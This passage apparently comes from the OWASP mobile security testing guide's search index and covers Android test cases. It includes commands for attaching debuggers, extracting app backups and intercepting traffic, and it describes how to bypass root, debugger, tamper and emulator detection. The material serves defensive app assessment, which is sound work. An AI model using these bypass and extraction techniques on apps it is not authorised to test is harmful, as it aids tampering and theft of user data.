Some apps will need to enable the DOM storage in order to display some HTML5 sites that use local storage. This should be carefully investigated as this might contain sensitive data.
Cookies: any existing cookies can be deleted by using CookieManager.removeAllCookies.
File APIs: proper data deletion in certain directories might not be that straightforward, some apps use a pragmatic solution which is to manually delete selected directories known to hold user data. This can be done using the java.io.File
API such as java.io.File.deleteRecursively
.
Example:
This example in Kotlin from the open source Firefox Focus app shows different cleanup steps:
override fun cleanup() {\n clearFormData() // Removes the autocomplete popup from the currently focused form field, if present. Note this only affects the display of the autocomplete popup, it does not remove any saved form data from this WebView's store. To do that, use WebViewDatabase#clearFormData.\n clearHistory()\n clearMatches()\n clearSslPreferences()\n clearCache(true)\n\n CookieManager.getInstance().removeAllCookies(null)\n\n WebStorage.getInstance().deleteAllData() // Clears all storage currently being used by the JavaScript storage APIs. This includes the Application Cache, Web SQL Database and the HTML5 Web Storage APIs.\n\n val webViewDatabase = WebViewDatabase.getInstance(context)\n // It isn't entirely clear how this differs from WebView.clearFormData()\n @Suppress(\"DEPRECATION\")\n webViewDatabase.clearFormData() // Clears any saved data for web forms.\n webViewDatabase.clearHttpAuthUsernamePassword()\n\n deleteContentFromKnownLocations(context) // calls FileUtils.deleteWebViewDirectory(context) which deletes all content in \"app_webview\".\n}\n
The function finishes with some extra manual file deletion in deleteContentFromKnownLocations
which calls functions from FileUtils
. These functions use the java.io.File.deleteRecursively
method to recursively delete files from the specified directories.
private fun deleteContent(directory: File, doNotEraseWhitelist: Set<String> = emptySet()): Boolean {\n val filesToDelete = directory.listFiles()?.filter { !doNotEraseWhitelist.contains(it.name) } ?: return false\n return filesToDelete.all { it.deleteRecursively() }\n}\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0037/#dynamic-analysis","title":"Dynamic Analysis","text":"Open a WebView accessing sensitive data and then log out of the application. Access the application's storage container and make sure all WebView related files are deleted. The following files and folders are typically related to WebViews:
Make sure that the release build has been signed via both the v1 and v2 schemes for Android 7.0 (API level 24) and above and via all three schemes for Android 9 (API level 28) and above, and that the code-signing certificate in the APK belongs to the developer.
APK signatures can be verified with the apksigner
tool. It is located at [SDK-Path]/build-tools/[version]
.
$ apksigner verify --verbose Desktop/example.apk\nVerifies\nVerified using v1 scheme (JAR signing): true\nVerified using v2 scheme (APK Signature Scheme v2): true\nVerified using v3 scheme (APK Signature Scheme v3): true\nNumber of signers: 1\n
The contents of the signing certificate can be examined with jarsigner
. Note that the Common Name (CN) attribute is set to \"Android Debug\" in the debug certificate.
The output for an APK signed with a debug certificate is shown below:
$ jarsigner -verify -verbose -certs example.apk\n\nsm 11116 Fri Nov 11 12:07:48 ICT 2016 AndroidManifest.xml\n\n X.509, CN=Android Debug, O=Android, C=US\n [certificate is valid from 3/24/16 9:18 AM to 8/10/43 9:18 AM]\n [CertPath not validated: Path doesn\\'t chain with any of the trust anchors]\n(...)\n
Ignore the \"CertPath not validated\" error. This error occurs with Java SDK 7 and above. Instead of jarsigner
, you can rely on the apksigner
to verify the certificate chain.
The signing configuration can be managed through Android Studio or the signingConfig
block in build.gradle
. To activate both the v1 and v2 schemes, the following values must be set:
v1SigningEnabled true\nv2SigningEnabled true\n
Several best practices for configuring the app for release are available in the official Android developer documentation.
Last but not least: make sure that the application is never deployed with your internal testing certificates.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0038/#dynamic-analysis","title":"Dynamic Analysis","text":"Static analysis should be used to verify the APK signature.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0039/","title":"Testing whether the App is Debuggable","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0039/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0039/#static-analysis","title":"Static Analysis","text":"Check AndroidManifest.xml
to determine whether the android:debuggable
attribute has been set and to find the attribute's value:
...\n <application android:allowBackup=\"true\" android:debuggable=\"true\" android:icon=\"@drawable/ic_launcher\" android:label=\"@string/app_name\" android:theme=\"@style/AppTheme\">\n ...\n
You can use aapt
tool from the Android SDK with the following command line to quickly check if the android:debuggable=\"true\"
directive is present:
# If the command prints 1 then the directive is present\n# The regex searches for this line: android:debuggable(0x0101000f)=(type 0x12)0xffffffff\n$ aapt d xmltree sieve.apk AndroidManifest.xml | grep -Ec \"android:debuggable\\(0x[0-9a-f]+\\)=\\(type\\s0x[0-9a-f]+\\)0xffffffff\"\n1\n
For a release build, this attribute should always be set to \"false\"
(the default value).
adb
can be used to determine whether an application is debuggable.
Use the following command:
# If the command prints a number greater than zero then the application has the debug flag\n# The regex searches for these lines:\n# flags=[ DEBUGGABLE HAS_CODE ALLOW_CLEAR_USER_DATA ALLOW_BACKUP ]\n# pkgFlags=[ DEBUGGABLE HAS_CODE ALLOW_CLEAR_USER_DATA ALLOW_BACKUP ]\n$ adb shell dumpsys package com.mwr.example.sieve | grep -c \"DEBUGGABLE\"\n2\n$ adb shell dumpsys package com.nondebuggableapp | grep -c \"DEBUGGABLE\"\n0\n
If an application is debuggable, executing application commands is trivial. In the adb
shell, execute run-as
by appending the package name and application command to the binary name:
$ run-as com.vulnerable.app id\nuid=10084(u0_a84) gid=10084(u0_a84) groups=10083(u0_a83),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:untrusted_app:s0:c512,c768\n
Android Studio can also be used to debug an application and verify debugging activation for an app.
Another method for determining whether an application is debuggable is attaching jdb
to the running process. If this is successful, debugging will be activated.
The following procedure can be used to start a debug session with jdb
:
Using adb
and jdwp
, identify the PID of the active application that you want to debug:
$ adb jdwp\n2355\n16346 <== last launched, corresponds to our application\n
Create a communication channel by using adb
between the application process (with the PID) and your host computer by using a specific local port:
# adb forward tcp:[LOCAL_PORT] jdwp:[APPLICATION_PID]\n$ adb forward tcp:55555 jdwp:16346\n
Using jdb
, attach the debugger to the local communication channel port and start a debug session:
$ jdb -connect com.sun.jdi.SocketAttach:hostname=localhost,port=55555\nSet uncaught java.lang.Throwable\nSet deferred uncaught java.lang.Throwable\nInitializing jdb ...\n> help\n
A few notes about debugging:
JADX
can be used to identify interesting locations for breakpoint insertion.jdb
is being bound to the local communication channel port, kill all adb sessions and start a single new session.Symbols are usually stripped during the build process, so you need the compiled bytecode and libraries to make sure that unnecessary metadata has been discarded.
First, find the nm
binary in your Android NDK and export it (or create an alias).
export NM = $ANDROID_NDK_DIR/toolchains/arm-linux-androideabi-4.9/prebuilt/darwin-x86_64/bin/arm-linux-androideabi-nm\n
To display debug symbols:
$NM -a libfoo.so\n/tmp/toolchains/arm-linux-androideabi-4.9/prebuilt/darwin-x86_64/bin/arm-linux-androideabi-nm: libfoo.so: no symbols\n
To display dynamic symbols:
$NM -D libfoo.so\n
Alternatively, open the file in your favorite disassembler and check the symbol tables manually.
Dynamic symbols can be stripped via the visibility
compiler flag. Adding this flag causes gcc to discard the function names while preserving the names of functions declared as JNIEXPORT
.
Make sure that the following has been added to build.gradle:
externalNativeBuild {\n cmake {\n cppFlags \"-fvisibility=hidden\"\n }\n}\n
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0040/#dynamic-analysis","title":"Dynamic Analysis","text":"Static analysis should be used to verify debugging symbols.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0041/","title":"Testing for Debugging Code and Verbose Error Logging","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0041/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0041/#static-analysis","title":"Static Analysis","text":"To determine whether StrictMode
is enabled, you can look for the StrictMode.setThreadPolicy
or StrictMode.setVmPolicy
methods. Most likely, they will be in the onCreate
method.
The detection methods for the thread policy are
detectDiskWrites()\ndetectDiskReads()\ndetectNetwork()\n
The penalties for thread policy violation are
penaltyLog() // Logs a message to LogCat\npenaltyDeath() // Crashes application, runs at the end of all enabled penalties\npenaltyDialog() // Shows a dialog\n
Have a look at the best practices for using StrictMode.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0041/#dynamic-analysis","title":"Dynamic Analysis","text":"There are several ways of detecting StrictMode
; the best choice depends on how the policies' roles are implemented. They include
Run execution traces with jdb, DDMS, strace
, and/or kernel modules to find out what the app is doing. You'll usually see all kinds of suspect interactions with the operating system, such as opening su
for reading and obtaining a list of processes. These interactions are surefire signs of root detection. Identify and deactivate the root detection mechanisms, one at a time. If you're performing a black box resilience assessment, disabling the root detection mechanisms is your first step.
To bypass these checks, you can use several techniques, most of which were introduced in the \"Reverse Engineering and Tampering\" chapter:
su
binary is enough to defeat root detection (try not to break your environment though!)./proc
to prevent reading of process lists. Sometimes, the unavailability of /proc
is enough to bypass such checks.Check for root detection mechanisms, including the following criteria:
Develop bypass methods for the root detection mechanisms and answer the following questions:
If root detection is missing or too easily bypassed, make suggestions in line with the effectiveness criteria listed above. These suggestions may include more detection mechanisms and better integration of existing mechanisms with other defenses.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0046/","title":"Testing Anti-Debugging Detection","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0046/#bypassing-debugger-detection","title":"Bypassing Debugger Detection","text":"There's no generic way to bypass anti-debugging: the best method depends on the particular mechanism(s) used to prevent or detect debugging and the other defenses in the overall protection scheme. For example, if there are no integrity checks or you've already deactivated them, patching the app might be the easiest method. In other cases, a hooking framework or kernel modules might be preferable. The following methods describe different approaches to bypass debugger detection:
isDebuggable
and isDebuggerConnected
to hide the debugger.When dealing with obfuscated apps, you'll often find that developers purposely \"hide away\" data and functionality in native libraries. You'll find an example of this in UnCrackable App for Android Level 2.
At first glance, the code looks like the prior challenge. A class called CodeCheck
is responsible for verifying the code entered by the user. The actual check appears to occur in the bar
method, which is declared as a native method.
package sg.vantagepoint.uncrackable2;\n\npublic class CodeCheck {\n public CodeCheck() {\n super();\n }\n\n public boolean a(String arg2) {\n return this.bar(arg2.getBytes());\n }\n\n private native boolean bar(byte[] arg1) {\n }\n}\n\n static {\n System.loadLibrary(\"foo\");\n }\n
Please see different proposed solutions for the Android Crackme Level 2 in GitHub.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0046/#effectiveness-assessment","title":"Effectiveness Assessment","text":"Check for anti-debugging mechanisms, including the following criteria:
Work on bypassing the anti-debugging defenses and answer the following questions:
If anti-debugging mechanisms are missing or too easily bypassed, make suggestions in line with the effectiveness criteria above. These suggestions may include adding more detection mechanisms and better integration of existing mechanisms with other defenses.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0047/","title":"Testing File Integrity Checks","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0047/#bypassing-file-integrity-checks","title":"Bypassing File Integrity Checks","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0047/#bypassing-the-application-source-integrity-checks","title":"Bypassing the application-source integrity checks","text":"Refer to Method Hooking for examples of patching, code injection, and kernel modules.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0047/#bypassing-the-storage-integrity-checks","title":"Bypassing the storage integrity checks","text":"Application-source integrity checks:
Run the app in an unmodified state and make sure that everything works. Apply simple patches to classes.dex
and any .so libraries in the app package. Re-package and re-sign the app as described in the \"Basic Security Testing\" chapter, then run the app. The app should detect the modification and respond in some way. At the very least, the app should alert the user and/or terminate. Work on bypassing the defenses and answer the following questions:
Storage integrity checks:
An approach similar to that for application-source integrity checks applies. Answer the following questions:
Launch the app with various reverse engineering tools and frameworks installed in your test device. Include at least the following: Frida, Xposed, Substrate for Android, RootCloak, Android SSL Trust Killer.
The app should respond in some way to the presence of those tools. For example by:
Next, work on bypassing the detection of the reverse engineering tools and answer the following questions:
The following steps should guide you when bypassing detection of reverse engineering tools:
Refer to the \"Tampering and Reverse Engineering on Android\" chapter for examples of patching, code injection, and kernel modules.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0049/","title":"Testing Emulator Detection","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0049/#bypassing-emulator-detection","title":"Bypassing Emulator Detection","text":"TelephonyManager.getDeviceID
method to return an IMEI value.Refer to the \"Tampering and Reverse Engineering on Android\" chapter for examples of patching, code injection, and kernel modules.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0049/#effectiveness-assessment","title":"Effectiveness Assessment","text":"Install and run the app in the emulator. The app should detect that it is being executed in an emulator and terminate or refuse to execute the functionality that's meant to be protected.
Work on bypassing the defenses and answer the following questions:
Make sure that all file-based detection of reverse engineering tools is disabled. Then, inject code by using Xposed, Frida, and Substrate, and attempt to install native hooks and Java method hooks. The app should detect the \"hostile\" code in its memory and respond accordingly.
Work on bypassing the checks with the following techniques:
Refer to the \"Tampering and Reverse Engineering on Android\" chapter for examples of patching, code injection, and kernel modules.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0051/","title":"Testing Obfuscation","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0051/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0051/#static-analysis","title":"Static Analysis","text":"Decompile the APK and review it to determine whether the codebase has been obfuscated.
Below you can find a sample for an obfuscated code block:
package com.a.a.a;\n\nimport com.a.a.b.a;\nimport java.util.List;\n\nclass a$b\n extends a\n{\n public a$b(List paramList)\n {\n super(paramList);\n }\n\n public boolean areAllItemsEnabled()\n {\n return true;\n }\n\n public boolean isEnabled(int paramInt)\n {\n return true;\n }\n}\n
Here are some considerations:
For native code:
Some of these techniques are discussed and analyzed in the blog post \"Security hardening of Android native code\" by Gautam Arvind and in the \"APKiD: Fast Identification of AppShielding Products\" presentation by Eduardo Novella.
For a more detailed assessment, you need a detailed understanding of the relevant threats and the obfuscation methods used. Tools such as APKiD may give you additional indications about which techniques were used for the target app such as obfuscators, packers and anti-debug measures.
"},{"location":"MASTG/tests/android/MASVS-RESILIENCE/MASTG-TEST-0051/#dynamic-analysis","title":"Dynamic Analysis","text":"You can use APKiD to detect if the app has been obfuscated.
Example using the UnCrackable App for Android Level 4:
apkid owasp-mastg/Crackmes/Android/Level_04/r2pay-v1.0.apk\n[+] APKiD 2.1.2 :: from RedNaga :: rednaga.io\n[*] owasp-mastg/Crackmes/Android/Level_04/r2pay-v1.0.apk!classes.dex\n |-> anti_vm : Build.TAGS check, possible ro.secure check\n |-> compiler : r8\n |-> obfuscator : unreadable field names, unreadable method names\n
In this case it detects that the app has unreadable field names and method names, among other things.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0001/","title":"Testing Local Storage for Sensitive Data","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0001/#overview","title":"Overview","text":"This test case focuses on identifying potentially sensitive data stored by an application and verifying if it is securely stored. The following checks should be performed:
SharedPreferences
, databases, Internal Storage, External Storage, etc.NOTE: For MASVS L1 compliance, it is sufficient to store data unencrypted in the application's internal storage directory (sandbox). For L2 compliance, additional encryption is required using cryptographic keys securely managed in the Android KeyStore. This includes using envelope encryption (DEK+KEK) or equivalent methods, or using the Android Security Library's EncryptedFile
/EncryptedSharedPreferences
.
First of all, try to determine the kind of storage used by the Android app and to find out whether the app processes sensitive data insecurely.
AndroidManifest.xml
for read/write external storage permissions, for example, uses-permission android:name=\"android.permission.WRITE_EXTERNAL_STORAGE\"
.MODE_WORLD_READABLE
or MODE_WORLD_WRITABLE
: You should avoid using MODE_WORLD_WRITEABLE
and MODE_WORLD_READABLE
for files because any app will be able to read from or write to the files, even if they are stored in the app's private data directory. If data must be shared with other applications, consider a content provider. A content provider offers read and write permissions to other apps and can grant dynamic permission on a case-by-case basis.SharedPreferences
class ( stores key-value pairs)FileOutPutStream
class (uses internal or external storage)getExternal*
functions (use external storage)getWritableDatabase
function (returns a SQLiteDatabase for writing)getReadableDatabase
function (returns a SQLiteDatabase for reading)getCacheDir
and getExternalCacheDirs
function (use cached files)Encryption should be implemented using proven SDK functions. The following describes bad practices to look for in the source code:
A typical misuse are hard-coded cryptographic keys. Hard-coded and world-readable cryptographic keys significantly increase the possibility that encrypted data will be recovered. Once an attacker obtains the data, decrypting it is trivial. Symmetric cryptography keys must be stored on the device, so identifying them is just a matter of time and effort. Consider the following code:
this.db = localUserSecretStore.getWritableDatabase(\"SuperPassword123\");\n
Obtaining the key is trivial because it is contained in the source code and identical for all installations of the app. Encrypting data this way is not beneficial. Look for hard-coded API keys/private keys and other valuable data; they pose a similar risk. Encoded/encrypted keys represent another attempt to make it harder but not impossible to get the crown jewels.
Consider the following code:
Example in Java:
//A more complicated effort to store the XOR'ed halves of a key (instead of the key itself)\nprivate static final String[] myCompositeKey = new String[]{\n \"oNQavjbaNNSgEqoCkT9Em4imeQQ=\",\"3o8eFOX4ri/F8fgHgiy/BS47\"\n};\n
Example in Kotlin:
private val myCompositeKey = arrayOf<String>(\"oNQavjbaNNSgEqoCkT9Em4imeQQ=\", \"3o8eFOX4ri/F8fgHgiy/BS47\")\n
The algorithm for decoding the original key might be something like this:
Example in Java:
public void useXorStringHiding(String myHiddenMessage) {\n byte[] xorParts0 = Base64.decode(myCompositeKey[0],0);\n byte[] xorParts1 = Base64.decode(myCompositeKey[1],0);\n\n byte[] xorKey = new byte[xorParts0.length];\n for(int i = 0; i < xorParts1.length; i++){\n xorKey[i] = (byte) (xorParts0[i] ^ xorParts1[i]);\n }\n HidingUtil.doHiding(myHiddenMessage.getBytes(), xorKey, false);\n}\n
Example in Kotlin:
fun useXorStringHiding(myHiddenMessage:String) {\n val xorParts0 = Base64.decode(myCompositeKey[0], 0)\n val xorParts1 = Base64.decode(myCompositeKey[1], 0)\n val xorKey = ByteArray(xorParts0.size)\n for (i in xorParts1.indices)\n {\n xorKey[i] = (xorParts0[i] xor xorParts1[i]).toByte()\n }\n HidingUtil.doHiding(myHiddenMessage.toByteArray(), xorKey, false)\n}\n
Verify common locations of secrets:
<resources>\n <string name=\"app_name\">SuperApp</string>\n <string name=\"hello_world\">Hello world!</string>\n <string name=\"action_settings\">Settings</string>\n <string name=\"secret_key\">My_Secret_Key</string>\n </resources>\n
buildTypes {\n debug {\n minifyEnabled true\n buildConfigField \"String\", \"hiddenPassword\", \"\\\"${hiddenPassword}\\\"\"\n }\n}\n
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0001/#dynamic-analysis","title":"Dynamic Analysis","text":"Install and use the app, executing all functions at least once. Data can be generated when entered by the user, sent by the endpoint, or shipped with the app. Then complete the following:
/data/data/<package-name>/databases
./data/data/<package-name>/shared_prefs
) for sensitive information. Shared Preferences are insecure and unencrypted by default. Some apps might opt to use secure-preferences to encrypt the values stored in Shared Preferences./data/data/<package-name>
. Only the user and group created when you installed the app (e.g., u0_a82) should have user read, write, and execute permissions (rwx
). Other users should not have permission to access files, but they may have execute permissions for directories.https://_firebaseProjectName_.firebaseio.com/.json
/data/data/<package-name>/files/
, whether it is unencrypted, and whether it contains sensitive information. By default, the file extension is realm
and the file name is default
. Inspect the Realm database with the Realm Browser.This test case focuses on identifying any sensitive application data within both system and application logs. The following checks should be performed:
As a general recommendation to avoid potential sensitive application data leakage, logging statements should be removed from production releases unless deemed necessary to the application or explicitly identified as safe, e.g. as a result of a security audit.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0003/#static-analysis","title":"Static Analysis","text":"Applications will often use the Log Class and Logger Class to create logs. To discover this, you should audit the application's source code for any such logging classes. These can often be found by searching for the following keywords:
Functions and classes, such as:
android.util.Log
Log.d
| Log.e
| Log.i
| Log.v
| Log.w
| Log.wtf
Logger
Keywords and system output:
System.out.print
| System.err.print
While preparing the production release, you can use tools like ProGuard (included in Android Studio). To determine whether all logging functions from the android.util.Log
class have been removed, check the ProGuard configuration file (proguard-rules.pro) for the following options (according to this example of removing logging code and this article about enabling ProGuard in an Android Studio project):
-assumenosideeffects class android.util.Log\n{\n public static boolean isLoggable(java.lang.String, int);\n public static int v(...);\n public static int i(...);\n public static int w(...);\n public static int d(...);\n public static int e(...);\n public static int wtf(...);\n}\n
Note that the example above only ensures that calls to the Log class' methods will be removed. If the string that will be logged is dynamically constructed, the code that constructs the string may remain in the bytecode. For example, the following code issues an implicit StringBuilder
to construct the log statement:
Example in Java:
Log.v(\"Private key tag\", \"Private key [byte format]: \" + key);\n
Example in Kotlin:
Log.v(\"Private key tag\", \"Private key [byte format]: $key\")\n
The compiled bytecode, however, is equivalent to the bytecode of the following log statement, which constructs the string explicitly:
Example in Java:
Log.v(\"Private key tag\", new StringBuilder(\"Private key [byte format]: \").append(key.toString()).toString());\n
Example in Kotlin:
Log.v(\"Private key tag\", StringBuilder(\"Private key [byte format]: \").append(key).toString())\n
ProGuard guarantees removal of the Log.v
method call. Whether the rest of the code (new StringBuilder ...
) will be removed depends on the complexity of the code and the ProGuard version.
This is a security risk because the (unused) string leaks plain text data into memory, which can be accessed via a debugger or memory dumping.
Unfortunately, no silver bullet exists for this issue, but one option would be to implement a custom logging facility that takes simple arguments and constructs the log statements internally.
SecureLog.v(\"Private key [byte format]: \", key);\n
Then configure ProGuard to strip its calls.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0003/#dynamic-analysis","title":"Dynamic Analysis","text":"Use all the mobile app functions at least once, then identify the application's data directory and look for log files (/data/data/<package-name>
). Check the application logs to determine whether log data has been generated; some mobile applications create and store their own logs in the data directory.
Many application developers still use System.out.println
or printStackTrace
instead of a proper logging class. Therefore, your testing strategy must include all output generated while the application is starting, running and closing. To determine what data is directly printed by System.out.println
or printStackTrace
, you can use Logcat
as explained in the chapter \"Basic Security Testing\", section \"Monitoring System Logs\".
Remember that you can target a specific app by filtering the Logcat output as follows:
adb logcat | grep \"$(adb shell ps | grep <package-name> | awk '{print $2}')\"\n
If you already know the app PID you may give it directly using --pid
flag.
You may also want to apply further filters or regular expressions (using logcat
's regex flags -e <expr>, --regex=<expr>
for example) if you expect certain strings or patterns to come up in the logs.
To determine whether API calls and functions provided by the third-party library are used according to best practices, review their source code, requested permissions and check for any known vulnerabilities.
All data that's sent to third-party services should be anonymized to prevent exposure of PII (Personal Identifiable Information) that would allow the third party to identify the user account. No other data (such as IDs that can be mapped to a user account or session) should be sent to a third party.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0004/#dynamic-analysis","title":"Dynamic Analysis","text":"Check all requests to external services for embedded sensitive information. To intercept traffic between the client and server, you can perform dynamic analysis by launching a man-in-the-middle (MITM) attack with Burp Suite Professional or OWASP ZAP. Once you route the traffic through the interception proxy, you can try to sniff the traffic that passes between the app and server. All app requests that aren't sent directly to the server on which the main function is hosted should be checked for sensitive information, such as PII in a tracker or ad service.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0005/","title":"Determining Whether Sensitive Data Is Shared with Third Parties via Notifications","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0005/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0005/#static-analysis","title":"Static Analysis","text":"Search for any usage of the NotificationManager
class which might be an indication of some form of notification management. If the class is being used, the next step would be to understand how the application is generating the notifications and which data ends up being shown.
Run the application and start tracing all calls to functions related to the notifications creation, e.g. setContentTitle
or setContentText
from NotificationCompat.Builder
. Observe the trace in the end and evaluate if it contains any sensitive information which another app might have eavesdropped.
In the layout definition of an activity, you can define TextViews
that have XML attributes. If the XML attribute android:inputType
is given the value textNoSuggestions
, the keyboard cache will not be shown when the input field is selected. The user will have to type everything manually.
<EditText\n android:id=\"@+id/KeyBoardCache\"\n android:inputType=\"textNoSuggestions\" />\n
The code for all input fields that take sensitive information should include this XML attribute to disable the keyboard suggestions.
Alternatively, the developer can use the following constants:
XMLandroid:inputType
Code InputType
API level textPassword
TYPE_TEXT_VARIATION_PASSWORD
3 textVisiblePassword
TYPE_TEXT_VARIATION_VISIBLE_PASSWORD
3 numberPassword
TYPE_NUMBER_VARIATION_PASSWORD
11 textWebPassword
TYPE_TEXT_VARIATION_WEB_PASSWORD
11 Check the application code to verify that none of the input types are being overwritten. For example, by doing findViewById(R.id.KeyBoardCache).setInputType(InputType.TYPE_CLASS_TEXT)
the input type of the input field KeyBoardCache
is set to text
reenabling the keyboard cache.
Finally, check the minimum required SDK version in the Android Manifest (android:minSdkVersion
) since it must support the used constants (for example, Android SDK version 11 is required for textWebPassword
). Otherwise, the compiled app would not honor the used input type constants allowing keyboard caching.
Start the app and click in the input fields that take sensitive data. If strings are suggested, the keyboard cache has not been disabled for these fields.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0009/","title":"Testing Backups for Sensitive Data","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0009/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0009/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0009/#local","title":"Local","text":"Check the AndroidManifest.xml
file for the following flag:
android:allowBackup=\"true\"\n
If the flag value is true, determine whether the app saves any kind of sensitive data (check the test case \"Testing for Sensitive Data in Local Storage\").
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0009/#cloud","title":"Cloud","text":"Regardless of whether you use key/value backup or auto backup, you must determine the following:
If you don't want to share files with Google Cloud, you can exclude them from Auto Backup. Sensitive information stored at rest on the device should be encrypted before being sent to the cloud.
android:allowBackup
within the application's manifest file. Auto Backup is enabled by default for applications that target Android 6.0 (API level 23). You can use the attribute android:fullBackupOnly
to activate auto backup when implementing a backup agent, but this attribute is available for Android versions 6.0 and above only. Other Android versions use key/value backup instead.android:fullBackupOnly\n
Auto backup includes almost all the app files and stores up 25 MB of them per app in the user's Google Drive account. Only the most recent backup is stored; the previous backup is deleted.
AndroidManifest.xml
for the following attribute:android:backupAgent\n
To implement key/value backup, extend one of the following classes:
To check for key/value backup implementations, look for these classes in the source code.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0009/#dynamic-analysis","title":"Dynamic Analysis","text":"After executing all available app functions, attempt to back up via adb
. If the backup is successful, inspect the backup archive for sensitive data. Open a terminal and run the following command:
adb backup -apk -nosystem <package-name>\n
ADB should respond now with \"Now unlock your device and confirm the backup operation\" and you should be asked on the Android phone for a password. This is an optional step and you don't need to provide one. If the phone does not prompt this message, try the following command including the quotes:
adb backup \"-apk -nosystem <package-name>\"\n
The problem happens when your device has an adb version prior to 1.0.31. If that's the case you must use an adb version of 1.0.31 also on your host computer. Versions of adb after 1.0.32 broke the backwards compatibility.
Approve the backup from your device by selecting the Back up my data option. After the backup process is finished, the file .ab will be in your working directory. Run the following command to convert the .ab file to tar.
dd if=mybackup.ab bs=24 skip=1|openssl zlib -d > mybackup.tar\n
In case you get the error openssl:Error: 'zlib' is an invalid command.
you can try to use Python instead.
dd if=backup.ab bs=1 skip=24 | python -c \"import zlib,sys;sys.stdout.write(zlib.decompress(sys.stdin.read()))\" > backup.tar\n
The Android Backup Extractor is another alternative backup tool. To make the tool to work, you have to download the Oracle JCE Unlimited Strength Jurisdiction Policy Files for JRE7 or JRE8 and place them in the JRE lib/security folder. Run the following command to convert the tar file:
java -jar abe.jar unpack backup.ab\n
if it shows some Cipher information and usage, which means it hasn't unpacked successfully. In this case you can give a try with more arguments:
abe [-debug] [-useenv=yourenv] unpack <backup.ab> <backup.tar> [password]\n
[password]
is the password when your android device asked you earlier. For example here is: 123
java -jar abe.jar unpack backup.ab backup.tar 123\n
Extract the tar file to your working directory.
tar xvf mybackup.tar\n
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/","title":"Testing Memory for Sensitive Data","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/#overview","title":"Overview","text":"Analyzing memory can help developers identify the root causes of several problems, such as application crashes. However, it can also be used to access sensitive data. This section describes how to check for data disclosure via process memory.
First identify sensitive information that is stored in memory. Sensitive assets have likely been loaded into memory at some point. The objective is to verify that this information is exposed as briefly as possible.
To investigate an application's memory, you must first create a memory dump. You can also analyze the memory in real-time, e.g., via a debugger. Regardless of your approach, memory dumping is a very error-prone process in terms of verification because each dump contains the output of executed functions. You may miss executing critical scenarios. In addition, overlooking data during analysis is probable unless you know the data's footprint (either the exact value or the data format). For example, if the app encrypts with a randomly generated symmetric key, you likely won't be able to spot it in memory unless you can recognize the key's value in another context.
Therefore, you are better off starting with static analysis.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/#static-analysis","title":"Static Analysis","text":"When performing static analysis to identify sensitive data that is exposed in memory, you should:
String
and BigInteger
).StringBuilder
).finalize
method.The following section describes pitfalls of data leakage in memory and best practices for avoiding them.
Don't use immutable structures (e.g., String
and BigInteger
) to represent secrets. Nullifying these structures will be ineffective: the garbage collector may collect them, but they may remain on the heap after garbage collection. Nevertheless, you should ask for garbage collection after every critical operation (e.g., encryption, parsing server responses that contain sensitive information). When copies of the information have not been properly cleaned (as explained below), your request will help reduce the length of time for which these copies are available in memory.
To properly clean sensitive information from memory, store it in primitive data types, such as byte-arrays (byte[]
) and char-arrays (char[]
). You should avoid storing the information in mutable non-primitive data types.
Make sure to overwrite the content of the critical object once the object is no longer needed. Overwriting the content with zeroes is one simple and very popular method:
Example in Java:
